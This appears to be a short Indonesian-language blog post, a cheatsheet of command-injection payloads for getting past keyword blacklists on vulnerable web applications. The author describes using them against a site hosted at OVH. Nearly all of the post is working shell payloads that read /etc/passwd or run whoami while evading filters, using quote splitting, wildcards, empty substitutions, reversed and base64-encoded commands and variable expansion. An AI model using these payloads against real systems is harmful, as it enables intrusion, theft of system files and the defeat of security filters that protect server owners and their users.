Command Injection Bypass Cheatsheet

Command Injection Bypass Cheatsheet. Adakalanya saat kita melakukan command injection pada website atau aplikasi yang rentan command atau perintah yang kita kirim diblock karena mengandung kata yang sudah diblacklist. nah di tutorial ini saya akan sharing bagaimana caya membypass blacklist tersebut.

Command Injection Bypass Cheatsheet

Di contoh ini saya menggunakan perintah untuk melihat /etc/passwd .

Normal command :

cat etc/passwd

Nah di kasus yang saya alami, saya di block ketika ingin melakukan command injection pada web yang dihost di OVH.

Command with Quote

cat /e"t"c/pa"s"swd
cat /'e'tc/pa's'swd

Wildcard

cat /etc/pa??wd
cat /etc/pa*wd

Null variable

cat /et``c/passw``d
cat /et$()c/pa$()sswd
cat /et${neko}c/pas${poi}swd

Reverse & Encode command

`echo "dwssap/cte/ tac" | rev`
$(echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d)

Bypass with single quote

w'h'o'am'i

Bypass with double quote

w"h"o"am"i

Bypass with backslash and slash

w\ho\am\i
/\b\i\n/////s\h

Bypass with [email protected]

[email protected]

Bypass with variable expansion

/???/??t /???/p??s??
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}

Oke mungkin sekian sharing kali ini, jika ada yang ingin ditambahkan silahkan komentar.

Shares

2 Comments

Leave a Reply